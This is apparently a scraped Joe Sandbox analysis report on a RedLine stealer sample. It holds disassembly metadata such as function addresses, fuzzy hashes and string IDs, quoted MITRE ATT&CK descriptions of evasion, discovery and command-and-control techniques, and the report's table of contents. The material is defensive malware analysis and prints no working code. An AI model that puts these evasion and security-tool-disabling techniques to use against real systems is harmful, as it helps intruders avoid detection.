Instruction Fuzzy Hash: 3771BC30B043859FC758AF78D46566E3BA6EF89340F2088A9D809DB395DF39DD06CB91

Function 026C5208 Relevance: 10.2, Strings: 8, Instructions: 235COMMON

Download Yara Rule

Strings

f, xrefs: 026C5267
f, xrefs: 026C52F6
f, xrefs: 026C53B1
f, xrefs: 026C5469
f, xrefs: 026C547C
f, xrefs: 026C530B
f, xrefs: 026C53C4
f, xrefs: 026C5252

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f$f$f$f$f$f$f
API String ID: 0-3467455323
Opcode ID: 8c4fdc997102f0f3b49afadd9092292c178dd0aa9b45f51b24dcf041b51186a1
Instruction ID: befe36d499005fd41c78fe26afffb95f1e06a0ce2a98086bf9c78112ea4ac42e
Opcode Fuzzy Hash: 8c4fdc997102f0f3b49afadd9092292c178dd0aa9b45f51b24dcf041b51186a1
Instruction Fuzzy Hash: 2C81B170E042549FCB04AFB8D4155AE7FB1FF86350F6584AAD849EB392DB349E02CB91

Function 026CF0C8 Relevance: 7.8, Strings: 6, Instructions: 297COMMON

Download Yara Rule

Strings

4'jq, xrefs: 026CF3F9
f, xrefs: 026CF10C
f, xrefs: 026CF14D
P?oq, xrefs: 026CF371
f, xrefs: 026CF15F
xnq, xrefs: 026CF3B5

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: 4'jq$P?oq$xnq$f$f$f
API String ID: 0-1584779459
Opcode ID: a1a6389b5801a5caf35f163f8ef6d0f88358fb8d371ae2a0df68efb5153f8faf
Instruction ID: a01d91bbb390077f16e4519860e7334563e32f8158f3a46a4ac09b152c6ee93e
Opcode Fuzzy Hash: a1a6389b5801a5caf35f163f8ef6d0f88358fb8d371ae2a0df68efb5153f8faf
Instruction Fuzzy Hash: EFA1BE357402448FCB05EFB8D5549AA7BBAEF89310B1045AAD504CB379EF78DD0ACBA1

Function 026C58C8 Relevance: 7.7, Strings: 6, Instructions: 166COMMON

Download Yara Rule

Strings

(_jq, xrefs: 026C5942
f, xrefs: 026C59F7
(_jq, xrefs: 026C59C1
f, xrefs: 026C5A0C
f, xrefs: 026C598D
f, xrefs: 026C5978

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: (_jq$(_jq$f$f$f$f
API String ID: 0-2244927899
Opcode ID: 975d9b290014f8baa1cd60e5386b909ceca0861b3063936b91a69cc7ff8f4391
Instruction ID: 5b249543be324069df15aad377a467c8e7fc63f12fc4bf57c4924b3b3d12b72b
Opcode Fuzzy Hash: 975d9b290014f8baa1cd60e5386b909ceca0861b3063936b91a69cc7ff8f4391
Instruction Fuzzy Hash: 2E51E3347042459FDB04AF78C4646AE7BA2FF85310F6484AEE846EB381DB35ED46CB91

Function 026C4948 Relevance: 6.4, Strings: 5, Instructions: 164COMMON

Download Yara Rule

Strings

Hnq, xrefs: 026C4AA8
f, xrefs: 026C49D9
f, xrefs: 026C4AD5
f, xrefs: 026C4A03
f, xrefs: 026C4AB9

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: Hnq$f$f$f$f
API String ID: 0-4292234692
Opcode ID: 6dc1134e166ffc544e87528f8a60afb5e5b9ea7d3693edb2ec55b34bf7d8772d
Instruction ID: 1bbcf0baf758c22e6e39a88619e4236373f6019946392c16ca6a230120b950f9
Opcode Fuzzy Hash: 6dc1134e166ffc544e87528f8a60afb5e5b9ea7d3693edb2ec55b34bf7d8772d
Instruction Fuzzy Hash: 9951BC307042858FC715AFB8D46456E7BB6EF8A344B2084BAD849DB396DF38DD0AC791

Function 026CF640 Relevance: 6.4, Strings: 5, Instructions: 107COMMON

Download Yara Rule

Strings

f, xrefs: 026CF6CA
f, xrefs: 026CF6AE
f, xrefs: 026CF702
f, xrefs: 026CF72B
f, xrefs: 026CF6E6

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f$f$f$f
API String ID: 0-222800126
Opcode ID: b5fc1b634caac2ed30fe67e3c28f649cec9ac8b481928e5078449f460bc2f42e
Instruction ID: 23cc78ca0aae828ad7efef5572fce2d831054887bce5f53c636f09fd2aa265e3
Opcode Fuzzy Hash: b5fc1b634caac2ed30fe67e3c28f649cec9ac8b481928e5078449f460bc2f42e
Instruction Fuzzy Hash: 3331C1607042445FDB14AB7AD428B3A3ADBDFC4340F3480AAD509C77E9DE34DD028B96

Function 026CC5E8 Relevance: 5.3, Strings: 4, Instructions: 284COMMON

Download Yara Rule

Strings

f, xrefs: 026CC6ED
f, xrefs: 026CC967
f, xrefs: 026CC8DB
f, xrefs: 026CC7C6

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f$f$f
API String ID: 0-3269653588
Opcode ID: b3feb58ef41b0ef349f7e9ce225ae27c3392a1e0b70d2cf219c027479126f4cb
Instruction ID: e42b753c37c435a69cb4409dc703ccd75540d8eca2fec234e643f5842f48c79c
Opcode Fuzzy Hash: b3feb58ef41b0ef349f7e9ce225ae27c3392a1e0b70d2cf219c027479126f4cb
Instruction Fuzzy Hash: B1C1AC74A402099FDB44EFA9D954AAE7BF6FF88300F208169E509EB3A5DB34DC41CB51

Function 026CC9E0 Relevance: 5.2, Strings: 4, Instructions: 220COMMON

Download Yara Rule

Strings

f, xrefs: 026CCA77
f, xrefs: 026CCA65
f, xrefs: 026CCB6F
f, xrefs: 026CCA24

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f$f$f
API String ID: 0-3269653588
Opcode ID: 2389852894c7b4d1c2a33f7b497bb90d78b05d354974073e62cb4dbc497cd703
Instruction ID: 073ed3abcf7ef6efde43d0c120e6984369af577fbc5383f39019733cfb72fe1d
Opcode Fuzzy Hash: 2389852894c7b4d1c2a33f7b497bb90d78b05d354974073e62cb4dbc497cd703
Instruction Fuzzy Hash: 8171A234B002558FCB14EB79D45866E7BE6EFC5350B2480BAD90ADB395EF34DD028B91

Function 026C6108 Relevance: 5.2, Strings: 4, Instructions: 203COMMON

Download Yara Rule

Strings

f, xrefs: 026C612C
f, xrefs: 026C61AC
f, xrefs: 026C62F1
f, xrefs: 026C62E0

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f$f$f
API String ID: 0-3269653588
Opcode ID: 65f7df759e8d7241e7d390b92827f53ba5ec18861a45a57f9551e787118e2cad
Instruction ID: 9efbcb6f3a0c283b2a5f65f3aa70846a50def160e920072f068873b96c52ad99
Opcode Fuzzy Hash: 65f7df759e8d7241e7d390b92827f53ba5ec18861a45a57f9551e787118e2cad
Instruction Fuzzy Hash: FC61D6303043468FC715AF78D85866E7BA6EFC6310B248669D849CB396DF38EC06CB91

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bac4j0DRRb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
bac4j0DRRb.exe